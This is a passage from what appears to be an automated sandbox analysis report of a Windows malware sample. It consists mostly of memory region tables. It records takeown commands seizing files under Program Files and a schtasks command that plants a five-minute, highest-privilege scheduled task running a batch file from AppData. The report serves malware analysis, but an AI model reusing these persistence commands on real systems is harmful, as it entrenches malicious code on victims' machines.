| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:23 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #121: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #121 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Portable Devices\restaurant.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:45, Reason: Child Process |
| Unmonitor | End Time: 00:04:47, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x930 |
| Parent PID | 0x974 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EE8
0x
4B0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000100000 | 0x00100000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x0010ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00113fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00121fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00120000 | 0x00124fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00143fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x0417ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004180000 | 0x04180000 | 0x041bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041c0000 | 0x041c0000 | 0x041fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x04201fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04210000 | 0x042cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x042d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042e0000 | 0x042e0000 | 0x042e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042f0000 | 0x042f0000 | 0x042fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004300000 | 0x04300000 | 0x0450ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004300000 | 0x04300000 | 0x0433ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004340000 | 0x04340000 | 0x0437ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04380000 | 0x043a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004410000 | 0x04410000 | 0x0450ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004510000 | 0x04510000 | 0x0467ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004680000 | 0x04680000 | 0x04807fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004810000 | 0x04810000 | 0x04990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000049a0000 | 0x049a0000 | 0x05d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x05da0000 | 0x060d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec60000 | 0x7ec60000 | 0x7ed5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed60000 | 0x7ed60000 | 0x7ed82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ed88000 | 0x7ed88000 | 0x7ed88fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed89000 | 0x7ed89000 | 0x7ed8bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed8c000 | 0x7ed8c000 | 0x7ed8cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed8d000 | 0x7ed8d000 | 0x7ed8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #122: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #122 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\expenditurevincenttablet.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:45, Reason: Child Process |
| Unmonitor | End Time: 00:04:48, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5b8 |
| Parent PID | 0xf4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7F0
0x
650
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x0459ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x045bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000045a0000 | 0x045a0000 | 0x045affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000045b0000 | 0x045b0000 | 0x045b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x045c1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x045c0000 | 0x045c4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000045d0000 | 0x045d0000 | 0x045e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x0462ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004630000 | 0x04630000 | 0x0466ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004670000 | 0x04670000 | 0x04673fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004680000 | 0x04680000 | 0x04680fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x04691fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x046dffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x046e0000 | 0x04709fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000046e0000 | 0x046e0000 | 0x046e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046f0000 | 0x046f0000 | 0x046f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004710000 | 0x04710000 | 0x0471ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004720000 | 0x04720000 | 0x0498ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04720000 | 0x047ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000047e0000 | 0x047e0000 | 0x0481ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x0498ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04a3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a40000 | 0x04a40000 | 0x04bc7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bd0000 | 0x04bd0000 | 0x04d50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d60000 | 0x04d60000 | 0x0615ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06160000 | 0x06496fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f700000 | 0x7f700000 | 0x7f7fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f800000 | 0x7f800000 | 0x7f822fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f823000 | 0x7f823000 | 0x7f823fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f829000 | 0x7f829000 | 0x7f82bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f82c000 | 0x7f82c000 | 0x7f82efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f82f000 | 0x7f82f000 | 0x7f82ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #123: schtasks.exe
13
0
| Information | Value |
|---|---|
| ID | #123 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Create /tn DSHCA /tr "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\cKJ5Qstc.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:45, Reason: Child Process |
| Unmonitor | End Time: 00:04:53, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x96c |
| Parent PID | 0xdf0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EA8
0x
E70
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000c00000 | 0x00c00000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x00c0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00c13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c21fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c20000 | 0x00c20000 | 0x00c20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ce0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cf1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d00000 | 0x00dbdfff | Memory Mapped File | r |
|
|
|
- |
| schtasks.exe.mui | 0x00dc0000 | 0x00dd2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ef0000 | 0x00ef0000 | 0x00f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f30000 | 0x00f30000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x00f70000 | 0x01058fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000f70000 | 0x00f70000 | 0x00f70fff | Pagefile Backed Memory | r |
|
|
|
- |
| schtasks.exe | 0x01080000 | 0x010b1fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000010c0000 | 0x010c0000 | 0x050bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052c0000 | 0x055f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x73b00000 | 0x73b8bfff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x74380000 | 0x743acfff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76ce0000 | 0x76d71fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77670000 | 0x776f1fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fc20000 | 0x7fc20000 | 0x7fd1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fd20000 | 0x7fd20000 | 0x7fd42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fd43000 | 0x7fd43000 | 0x7fd43fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fd48000 | 0x7fd48000 | 0x7fd48fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fd4a000 | 0x7fd4a000 | 0x7fd4cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fd4d000 | 0x7fd4d000 | 0x7fd4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2018-10-03T13:08:00 |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0x1080000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\Windows\SysWOW64\schtasks.exe, size = 260 |
|
2 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Local Time, time = 2018-10-03 13:08:25 (Local Time) |
|
3 |
Process #124: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #124 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:46, Reason: Child Process |
| Unmonitor | End Time: 00:04:50, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xde8 |
| Parent PID | 0xdfc (c:\windows\syswow64\reg.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4C0
0x
8F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x043dffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000043e0000 | 0x043e0000 | 0x043fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000043e0000 | 0x043e0000 | 0x043effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000043f0000 | 0x043f0000 | 0x043f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x04401fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04400000 | 0x04404fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004410000 | 0x04410000 | 0x04423fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004430000 | 0x04430000 | 0x0446ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004470000 | 0x04470000 | 0x044affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000044b0000 | 0x044b0000 | 0x044b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000044c0000 | 0x044c0000 | 0x044c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x044d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044e0000 | 0x044e0000 | 0x0451ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004520000 | 0x04520000 | 0x0455ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004560000 | 0x04560000 | 0x04560fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004570000 | 0x04570000 | 0x0457ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004580000 | 0x04580000 | 0x046dffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04580000 | 0x045a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004580000 | 0x04580000 | 0x04580fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045e0000 | 0x045e0000 | 0x046dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x046e0000 | 0x0479dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x0483ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004840000 | 0x04840000 | 0x049c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000049d0000 | 0x049d0000 | 0x04b50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b60000 | 0x04b60000 | 0x05f5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x05f60000 | 0x06296fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f360000 | 0x7f360000 | 0x7f45ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f460000 | 0x7f460000 | 0x7f482fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f485000 | 0x7f485000 | 0x7f485fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f488000 | 0x7f488000 | 0x7f488fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f48a000 | 0x7f48a000 | 0x7f48cfff | Private Memory | rw |
|
|
|
- |
